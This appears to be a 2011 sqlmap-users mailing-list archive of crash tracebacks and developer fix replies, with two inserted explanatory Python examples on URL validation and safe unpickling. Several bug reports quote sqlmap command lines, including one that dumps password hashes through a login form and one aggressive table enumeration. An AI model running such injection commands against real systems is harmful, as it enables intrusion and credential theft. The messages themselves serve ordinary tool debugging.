|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-11 23:34:07
|
Hi,

This is fixed now. Thanks for reporting.

Bernardo

On 11 July 2011 12:10, Chris Oakley <chr...@gm...> wrote:
> [12:09:23] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4253), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sqlmap-u...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4253)
> Python version: 2.7.1
> Operating system: nt
> Command line: sqlmap.py -u **************************************************** --data username=foo&password=bar&login-php-submit-button=Login -p username --passwords
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 86, in main
>     start()
>   File "C:\Program Files\sqlmap-0.9\lib\controller\controller.py", line 554, in start
>     action()
>   File "C:\Program Files\sqlmap-0.9\lib\controller\action.py", line 77, in action
>     conf.dbmsHandler.getPasswordHashes(), "password hash")
>   File "C:\Program Files\sqlmap-0.9\plugins\generic\enumeration.py", line 395, in getPasswordHashes
>     attackCachedUsersPasswords()
>   File "C:\Program Files\sqlmap-0.9\lib\utils\hash.py", line 240, in attackCachedUsersPasswords
>     results = dictionaryAttack(kb.data.cachedUsersPasswords)
>   File "C:\Program Files\sqlmap-0.9\lib\utils\hash.py", line 507, in dictionaryAttack
>     p.start()
>   File "C:\Python27\lib\multiprocessing\process.py", line 104, in start
>     self._popen = Popen(self)
>   File "C:\Python27\lib\multiprocessing\forking.py", line 244, in __init__
>     dump(process_obj, to_child, HIGHEST_PROTOCOL)
>   File "C:\Python27\lib\multiprocessing\forking.py", line 167, in dump
>     ForkingPickler(file, protocol).dump(obj)
>   File "C:\Python27\lib\pickle.py", line 224, in dump
>     self.save(obj)
>   File "C:\Python27\lib\pickle.py", line 331, in save
>     self.save_reduce(obj=obj, *rv)
>   File "C:\Python27\lib\pickle.py", line 419, in save_reduce
>     save(state)
>   File "C:\Python27\lib\pickle.py", line 286, in save
>     f(self, obj) # Call unbound method with explicit self
>   File "C:\Python27\lib\pickle.py", line 649, in save_dict
>     self._batch_setitems(obj.iteritems())
>   File "C:\Python27\lib\pickle.py", line 681, in _batch_setitems
>     save(v)
>   File "C:\Python27\lib\pickle.py", line 286, in save
>     f(self, obj) # Call unbound method with explicit self
>   File "C:\Python27\lib\pickle.py", line 748, in save_global
>     (obj, module, name))
> PicklingError: Can't pickle <function bruteProcess at 0x01783CF0>: it's not found as lib.utils.hash.bruteProcess
>
> [*] shutting down at 12:09:23
>
>
> C:\Program Files\sqlmap-0.9>Traceback (most recent call last):
>   File "<string>", line 1, in <module>
>   File "C:\Python27\lib\multiprocessing\forking.py", line 347, in main
>     self = load(from_parent)
>   File "C:\Python27\lib\pickle.py", line 1378, in load
>     return Unpickler(file).load()
>   File "C:\Python27\lib\pickle.py", line 858, in load
>     dispatch[key](self)
>   File "C:\Python27\lib\pickle.py", line 880, in load_eof
>     raise EOFError
> EOFError

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
|
From: 1ndr4 j. <c0d...@gm...> - 2011-07-11 15:04:54
|
[WARNING] unknown charset 'sql_ascii'. Please report by e-mail to sql...@li... |
From: Chris O. <chr...@gm...> - 2011-07-11 11:10:15
|
[12:09:23] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4253), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sqlmap-u...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4253)
Python version: 2.7.1
Operating system: nt
Command line: sqlmap.py -u **************************************************** --data username=foo&password=bar&login-php-submit-button=Login -p username --passwords
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 86, in main
    start()
  File "C:\Program Files\sqlmap-0.9\lib\controller\controller.py", line 554, in start
    action()
  File "C:\Program Files\sqlmap-0.9\lib\controller\action.py", line 77, in action
    conf.dbmsHandler.getPasswordHashes(), "password hash")
  File "C:\Program Files\sqlmap-0.9\plugins\generic\enumeration.py", line 395, in getPasswordHashes
    attackCachedUsersPasswords()
  File "C:\Program Files\sqlmap-0.9\lib\utils\hash.py", line 240, in attackCachedUsersPasswords
    results = dictionaryAttack(kb.data.cachedUsersPasswords)
  File "C:\Program Files\sqlmap-0.9\lib\utils\hash.py", line 507, in dictionaryAttack
    p.start()
  File "C:\Python27\lib\multiprocessing\process.py", line 104, in start
    self._popen = Popen(self)
  File "C:\Python27\lib\multiprocessing\forking.py", line 244, in __init__
    dump(process_obj, to_child, HIGHEST_PROTOCOL)
  File "C:\Python27\lib\multiprocessing\forking.py", line 167, in dump
    ForkingPickler(file, protocol).dump(obj)
  File "C:\Python27\lib\pickle.py", line 224, in dump
    self.save(obj)
  File "C:\Python27\lib\pickle.py", line 331, in save
    self.save_reduce(obj=obj, *rv)
  File "C:\Python27\lib\pickle.py", line 419, in save_reduce
    save(state)
  File "C:\Python27\lib\pickle.py", line 286, in save
    f(self, obj) # Call unbound method with explicit self
  File "C:\Python27\lib\pickle.py", line 649, in save_dict
    self._batch_setitems(obj.iteritems())
  File "C:\Python27\lib\pickle.py", line 681, in _batch_setitems
    save(v)
  File "C:\Python27\lib\pickle.py", line 286, in save
    f(self, obj) # Call unbound method with explicit self
  File "C:\Python27\lib\pickle.py", line 748, in save_global
    (obj, module, name))
PicklingError: Can't pickle <function bruteProcess at 0x01783CF0>: it's not found as lib.utils.hash.bruteProcess

[*] shutting down at 12:09:23

C:\Program Files\sqlmap-0.9>Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "C:\Python27\lib\multiprocessing\forking.py", line 347, in main
    self = load(from_parent)
  File "C:\Python27\lib\pickle.py", line 1378, in load
    return Unpickler(file).load()
  File "C:\Python27\lib\pickle.py", line 858, in load
    dispatch[key](self)
  File "C:\Python27\lib\pickle.py", line 880, in load_eof
    raise EOFError
EOFError
|
From: Miroslav S. <mir...@gm...> - 2011-07-11 08:50:14
|
hi Jovon.

it should be fixed with the latest commit. the problem is that in your case some of the crawled links were in "invalid" form but from now on sqlmap shouldn't crash on these any more.

kr

On Mon, Jul 11, 2011 at 6:55 AM, Ahmed Shawky <ah...@is...> wrote:
> From the exception "InvalidURL: nonnumeric port: '80#content'"
> It seems that you supplied sqlmap with an invalid URL
>
> On Mon, Jul 11, 2011 at 5:00 AM, Jovon Itwaru <jov...@gm...> wrote:
>>
>> Received the following error when performing a crawl:
>> sqlmap version: 1.0-dev (r4243)
>> Python version: 2.6.1
>> Operating system: posix
>> Command line: ./sqlmap.py -u ******************** --crawl=2
>> Technique: None
>> Back-end DBMS: None (identified)
>> Traceback (most recent call last):
>>   File "./sqlmap.py", line 77, in main
>>     init(cmdLineOptions)
>>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 1837, in init
>>     __setCrawler()
>>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 421, in __setCrawler
>>     crawler.getTargetUrls()
>>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 109, in getTargetUrls
>>     runThreads(numThreads, crawlThread)
>>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/threads.py", line 104, in runThreads
>>     threadFunction()
>>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 59, in crawlThread
>>     content = Request.getPage(url=current, crawling=True, raise404=False)[0]
>>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/request/connect.py", line 281, in getPage
>>     conn = urllib2.urlopen(req)
>>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 124, in urlopen
>>     return _opener.open(url, data, timeout)
>>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 383, in open
>>     response = self._open(req, data)
>>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 401, in _open
>>     '_open', req)
>>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 361, in _call_chain
>>     result = func(*args)
>>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 1130, in http_open
>>     return self.do_open(httplib.HTTPConnection, req)
>>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 1087, in do_open
>>     h = http_class(host, timeout=req.timeout) # will parse host:port
>>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 656, in __init__
>>     self._set_hostport(host, port)
>>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 668, in _set_hostport
>>     raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
>> InvalidURL: nonnumeric port: '80#content'
>> [*] shutting down at 22:56:17
>
> --
>
> Ahmed Shawky El-Antry
> Pen-tester, Programmer and System administrator
> lnxg33k owner "http://lnxg33k.wordpress.com"
> Isecur1ty team member "http://www.isecur1ty.org"
> Twitter @lnxg33k

--
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
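The reply above attributes the crash to crawled links in an "invalid" form, such as the one behind the `nonnumeric port: '80#content'` exception. As an added illustration (not sqlmap's code; the function names, the same-host rule and the sample links are assumptions constructed for this example), a crawler can normalize and validate every link before requesting it, so a malformed one is skipped instead of aborting the run:

```python
from urllib.parse import urljoin, urlsplit, urlunsplit

ALLOWED_SCHEMES = {"http", "https"}


def normalize_link(base_url, href):
    """Return an absolute, fragment-free URL for href, or None if unusable.

    Unusable means: unparsable, not HTTP(S), a port that is not a number in
    0-65535, or a host other than the one the crawl started from.
    """
    try:
        base = urlsplit(base_url)
        parts = urlsplit(urljoin(base_url, href.strip()))
        _ = parts.port  # property access validates the port (ValueError if bad)
    except ValueError:
        return None
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return None
    if parts.hostname != base.hostname:
        # Assumption of this example: the crawl stays on the starting host.
        return None
    # The fragment is never sent to the server, so drop it before queueing.
    return urlunsplit((parts.scheme, parts.netloc, parts.path or "/",
                       parts.query, ""))


def collect_targets(base_url, hrefs):
    """Split crawled hrefs into unique usable URLs and rejected raw links."""
    seen, targets, rejected = set(), [], []
    for href in hrefs:
        url = normalize_link(base_url, href)
        if url is None:
            rejected.append(href)      # keep for logging, do not request
        elif url not in seen:
            seen.add(url)
            targets.append(url)
    return targets, rejected


# Constructed sample input: links as they might appear in crawled HTML.
BASE_URL = "http://www.example.com:80/index.php"
SAMPLE_HREFS = [
    "page.php?id=1#top",
    "page.php?id=1#bottom",                 # same target, different fragment
    "http://www.example.com:80#content",    # fragment directly after the port
    "http://www.example.com:80content/x",   # nonnumeric port
    "http://www.example.com:99999/",        # port out of range
    "mailto:admin@example.com",             # not HTTP(S)
    "http://other.example.org/a",           # different host
]

if __name__ == "__main__":
    ok, bad = collect_targets(BASE_URL, SAMPLE_HREFS)
    for url in ok:
        print("queue :", url)
    for href in bad:
        print("skip  :", href)
```
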
From: Ahmed S. <ah...@is...> - 2011-07-11 04:55:27
|
From the exception "InvalidURL: nonnumeric port: '80#content'"
It seems that you supplied sqlmap with an invalid URL

On Mon, Jul 11, 2011 at 5:00 AM, Jovon Itwaru <jov...@gm...> wrote:
> Received the following error when performing a crawl:
>
> sqlmap version: 1.0-dev (r4243)
> Python version: 2.6.1
> Operating system: posix
> Command line: ./sqlmap.py -u ******************** --crawl=2
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 77, in main
>     init(cmdLineOptions)
>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 1837, in init
>     __setCrawler()
>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 421, in __setCrawler
>     crawler.getTargetUrls()
>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 109, in getTargetUrls
>     runThreads(numThreads, crawlThread)
>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/threads.py", line 104, in runThreads
>     threadFunction()
>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 59, in crawlThread
>     content = Request.getPage(url=current, crawling=True, raise404=False)[0]
>   File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/request/connect.py", line 281, in getPage
>     conn = urllib2.urlopen(req)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 124, in urlopen
>     return _opener.open(url, data, timeout)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 383, in open
>     response = self._open(req, data)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 401, in _open
>     '_open', req)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 361, in _call_chain
>     result = func(*args)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 1130, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 1087, in do_open
>     h = http_class(host, timeout=req.timeout) # will parse host:port
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 656, in __init__
>     self._set_hostport(host, port)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 668, in _set_hostport
>     raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: '80#content'
>
> [*] shutting down at 22:56:17

--
- Ahmed Shawky El-Antry
- Pen-tester, Programmer and System administrator
- lnxg33k owner "http://lnxg33k.wordpress.com"
- Isecur1ty team member "http://www.isecur1ty.org"
- Twitter @lnxg33k
|
From: Jovon I. <jov...@gm...> - 2011-07-11 03:00:20
|
Received the following error when performing a crawl:

sqlmap version: 1.0-dev (r4243)
Python version: 2.6.1
Operating system: posix
Command line: ./sqlmap.py -u ******************** --crawl=2
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap.py", line 77, in main
    init(cmdLineOptions)
  File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 1837, in init
    __setCrawler()
  File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 421, in __setCrawler
    crawler.getTargetUrls()
  File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 109, in getTargetUrls
    runThreads(numThreads, crawlThread)
  File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/threads.py", line 104, in runThreads
    threadFunction()
  File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 59, in crawlThread
    content = Request.getPage(url=current, crawling=True, raise404=False)[0]
  File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/request/connect.py", line 281, in getPage
    conn = urllib2.urlopen(req)
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 124, in urlopen
    return _opener.open(url, data, timeout)
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 383, in open
    response = self._open(req, data)
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 401, in _open
    '_open', req)
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 361, in _call_chain
    result = func(*args)
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 1130, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 1087, in do_open
    h = http_class(host, timeout=req.timeout) # will parse host:port
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 656, in __init__
    self._set_hostport(host, port)
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 668, in _set_hostport
    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: '80#content'

[*] shutting down at 22:56:17
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-09 08:29:09
|
Hi Zeze,

Perhaps because the session user does not have read privileges over the table you're trying to dump? Try to run with --parse-errors to see if the web application discloses a DBMS error, and with -v 3. Run also with --privileges -U CU to see the current user's privileges.

Bernardo

On 8 July 2011 23:09, Zeze Canarinha <zez...@gm...> wrote:
> New fresh install.
>
> Appears to be everything ok... Or not... Data is not being shown.
>
> Sqlinjection is ok, found database, tables and columns but no data is shown.
>
> Anyone having this problem?
>
> BS

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-09 08:27:42
|
Hi Zeze,

This is fixed as of yesterday night.

Bernardo

On 8 July 2011 22:24, Zeze Canarinha <zez...@gm...> wrote:
> Sirs,
>
> After the update of today... :|
>
> [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4236), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4236)
> Python version: 2.6.5
> Operating system: posix
> Command line: ./sqlmap.py -u *********************************************************************************** --random-agent -D ************ -T ******** --columns threads 5
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", line 535, in start
>     __saveToSessionFile()
>   File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", line 166, in __saveToSessionFile
>     setInjection(inj)
>   File "/pentest/web/scanners/sqlmap/lib/core/session.py", line 55, in setInjection
>     and intersect(base64unpickle(kb.resumedQueries[conf.url]["Injection data"][:-1]).data.keys(),\
>   File "/pentest/web/scanners/sqlmap/lib/core/convert.py", line 44, in base64unpickle
>     return pickle.loads(base64decode(value))
>   File "/usr/lib/python2.6/pickle.py", line 1374, in loads
>     return Unpickler(file).load()
>   File "/usr/lib/python2.6/pickle.py", line 858, in load
>     dispatch[key](self)
>   File "/usr/lib/python2.6/pickle.py", line 1090, in load_global
>     klass = self.find_class(module, name)
>   File "/usr/lib/python2.6/pickle.py", line 1126, in find_class
>     klass = getattr(mod, name)
> AttributeError: 'module' object has no attribute 'injectionDict'

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
|
From: Miroslav S. <mir...@gm...> - 2011-07-09 08:18:22
|
hi Olu.

this should be fixed with r4237.

kr

On Sat, Jul 9, 2011 at 1:16 AM, Olu Akindeinde <sey...@gm...> wrote:
> Hi,
> Ran into this error whilst performing a test
> sqlmap version: 1.0-dev (r4236)
> Python version: 2.6.1
> Operating system: posix
> Command line: ./sqlmap.py -u *********************************************** --forms -D ****** --tables -v 3 --level=3 --technique=B
> Technique: BOOLEAN
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/Users/fx/sqlmap/lib/controller/controller.py", line 535, in start
>     __saveToSessionFile()
>   File "/Users/fx/sqlmap/lib/controller/controller.py", line 166, in __saveToSessionFile
>     setInjection(inj)
>   File "/Users/fx/sqlmap/lib/core/session.py", line 55, in setInjection
>     and intersect(base64unpickle(kb.resumedQueries[conf.url]["Injection data"][:-1]).data.keys(),\
>   File "/Users/fx/sqlmap/lib/core/convert.py", line 44, in base64unpickle
>     return pickle.loads(base64decode(value))
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", line 1374, in loads
>     return Unpickler(file).load()
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", line 858, in load
>     dispatch[key](self)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", line 1090, in load_global
>     klass = self.find_class(module, name)
>   File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", line 1126, in find_class
>     klass = getattr(mod, name)
> AttributeError: 'module' object has no attribute 'injectionDict'
> [*] shutting down at 00:14:18
> Thanks

--
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
From: Olu A. <sey...@gm...> - 2011-07-08 23:16:58
|
Hi,

Ran into this error whilst performing a test

sqlmap version: 1.0-dev (r4236)
Python version: 2.6.1
Operating system: posix
Command line: ./sqlmap.py -u *********************************************** --forms -D ****** --tables -v 3 --level=3 --technique=B
Technique: BOOLEAN
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/Users/fx/sqlmap/lib/controller/controller.py", line 535, in start
    __saveToSessionFile()
  File "/Users/fx/sqlmap/lib/controller/controller.py", line 166, in __saveToSessionFile
    setInjection(inj)
  File "/Users/fx/sqlmap/lib/core/session.py", line 55, in setInjection
    and intersect(base64unpickle(kb.resumedQueries[conf.url]["Injection data"][:-1]).data.keys(),\
  File "/Users/fx/sqlmap/lib/core/convert.py", line 44, in base64unpickle
    return pickle.loads(base64decode(value))
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", line 1374, in loads
    return Unpickler(file).load()
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", line 858, in load
    dispatch[key](self)
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", line 1090, in load_global
    klass = self.find_class(module, name)
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", line 1126, in find_class
    klass = getattr(mod, name)
AttributeError: 'module' object has no attribute 'injectionDict'

[*] shutting down at 00:14:18

Thanks
|
From: Zeze C. <zez...@gm...> - 2011-07-08 22:09:36
|
New fresh install.

Appears to be everything ok... Or not... Data is not being shown.

Sqlinjection is ok, found database, tables and columns but no data is shown.

Anyone having this problem?

BS

On 08/07/2011, Zeze Canarinha <zez...@gm...> wrote:
> Sirs,
>
> After the update of today... :|
>
> [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4236), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4236)
> Python version: 2.6.5
> Operating system: posix
> Command line: ./sqlmap.py -u *********************************************************************************** --random-agent -D ************ -T ******** --columns threads 5
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", line 535, in start
>     __saveToSessionFile()
>   File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", line 166, in __saveToSessionFile
>     setInjection(inj)
>   File "/pentest/web/scanners/sqlmap/lib/core/session.py", line 55, in setInjection
>     and intersect(base64unpickle(kb.resumedQueries[conf.url]["Injection data"][:-1]).data.keys(),\
>   File "/pentest/web/scanners/sqlmap/lib/core/convert.py", line 44, in base64unpickle
>     return pickle.loads(base64decode(value))
>   File "/usr/lib/python2.6/pickle.py", line 1374, in loads
>     return Unpickler(file).load()
>   File "/usr/lib/python2.6/pickle.py", line 858, in load
>     dispatch[key](self)
>   File "/usr/lib/python2.6/pickle.py", line 1090, in load_global
>     klass = self.find_class(module, name)
>   File "/usr/lib/python2.6/pickle.py", line 1126, in find_class
>     klass = getattr(mod, name)
> AttributeError: 'module' object has no attribute 'injectionDict'
|
From: Zeze C. <zez...@gm...> - 2011-07-08 21:25:03
|
Sirs,

After the update of today... :|

[CRITICAL] unhandled exception in sqlmap/1.0-dev (r4236), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4236)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py -u *********************************************************************************** --random-agent -D ************ -T ******** --columns threads 5
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", line 535, in start
    __saveToSessionFile()
  File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", line 166, in __saveToSessionFile
    setInjection(inj)
  File "/pentest/web/scanners/sqlmap/lib/core/session.py", line 55, in setInjection
    and intersect(base64unpickle(kb.resumedQueries[conf.url]["Injection data"][:-1]).data.keys(),\
  File "/pentest/web/scanners/sqlmap/lib/core/convert.py", line 44, in base64unpickle
    return pickle.loads(base64decode(value))
  File "/usr/lib/python2.6/pickle.py", line 1374, in loads
    return Unpickler(file).load()
  File "/usr/lib/python2.6/pickle.py", line 858, in load
    dispatch[key](self)
  File "/usr/lib/python2.6/pickle.py", line 1090, in load_global
    klass = self.find_class(module, name)
  File "/usr/lib/python2.6/pickle.py", line 1126, in find_class
    klass = getattr(mod, name)
AttributeError: 'module' object has no attribute 'injectionDict'
|
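The traceback in this thread ends inside pickle's find_class, which could not resolve the class name injectionDict stored in saved session data. The following is an added example, not sqlmap's code or its fix: a session loader that resolves only allow-listed names and treats any other record as stale instead of crashing. The module name demo_datatype, the replacement class name InjectionDict and the three sample records are constructed assumptions.

```python
import base64
import io
import pickle
import sys
import types

# Constructed stand-in module; "demo_datatype" and both class names are hypothetical.
mod = types.ModuleType("demo_datatype")
sys.modules["demo_datatype"] = mod

def define(name):
    cls = type(name, (dict,), {"__module__": "demo_datatype"})
    setattr(mod, name, cls)
    return cls

def encode(obj):
    return base64.b64encode(pickle.dumps(obj))

# Record written while the module still had a class named injectionDict.
STALE = encode(define("injectionDict")(place="GET", parameter="id"))
delattr(mod, "injectionDict")  # the "update": the old name no longer resolves
FRESH = encode(define("InjectionDict")(place="GET", parameter="id"))
FOREIGN = encode(len)  # names a global the session format never uses (benign)

ALLOWED = {("demo_datatype", "InjectionDict")}

def naive_load_error(value):
    """Same call shape as the traceback; returns the exception type name or None."""
    try:
        pickle.loads(base64.b64decode(value))
    except Exception as exc:
        return type(exc).__name__
    return None

class SessionUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve only names the current session format is known to contain.
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError("unexpected global %s.%s" % (module, name))
        return super().find_class(module, name)

def load_session_value(value):
    """Return the stored object, or None so the caller drops the record and re-tests."""
    try:
        return SessionUnpickler(io.BytesIO(base64.b64decode(value))).load()
    except (pickle.UnpicklingError, AttributeError, ImportError, ValueError, EOFError):
        return None

if __name__ == "__main__":
    for label, rec in (("stale", STALE), ("fresh", FRESH), ("foreign", FOREIGN)):
        print(label, naive_load_error(rec), load_session_value(rec))
```

The same allow-list that tolerates a renamed class also stops a session file from pulling in arbitrary globals during unpickling, which matters whenever session files can come from another machine or user.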
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-08 10:14:55
|
Hi,

Please find it fixed now, r4230.
Thanks for reporting.

Bernardo

On 8 July 2011 09:40, RS <li...@gm...> wrote:
> ./sqlmap.py -u
> "http://www.modsecurity.org/zero.webappsecurity.com/login1.asp" --data
> "login=&password=&graphicOption=minimum" --parse-errors -v 3
> --random-agent --level 5 --risk 3 --batch --dbms "Microsoft Access" --tables
>
> sqlmap version: 1.0-dev (r4224)
> Python version: 2.6.5
> Operating system: posix
> Command line: ./sqlmap.py -u
> ************************************************************* --data
> login=&password=&graphicOption=minimum --parse-errors -v 3
> --random-agent --level 5 --risk 3 --batch --dbms Microsoft Access --tables
> Technique: None
> Back-end DBMS: Microsoft Access (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/test/sqlmap-dev/lib/controller/controller.py", line 552, in start
>     action()
>   File "/test/sqlmap-dev/lib/controller/action.py", line 91, in action
>     conf.dumper.dbTables(conf.dbmsHandler.getTables())
>   File "/test/sqlmap-dev/plugins/generic/enumeration.py", line 806, in
> getTables
>     tables = self.getTables(False)
>   File "/test/sqlmap-dev/plugins/generic/enumeration.py", line 867, in
> getTables
>     query = rootQuery.inband.query
> AttributeError: 'DictObject' object has no attribute 'inband'
>
> [*] shutting down at 01:39:31
>
> The problem happens with --tables, --columns, --common-tables

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
|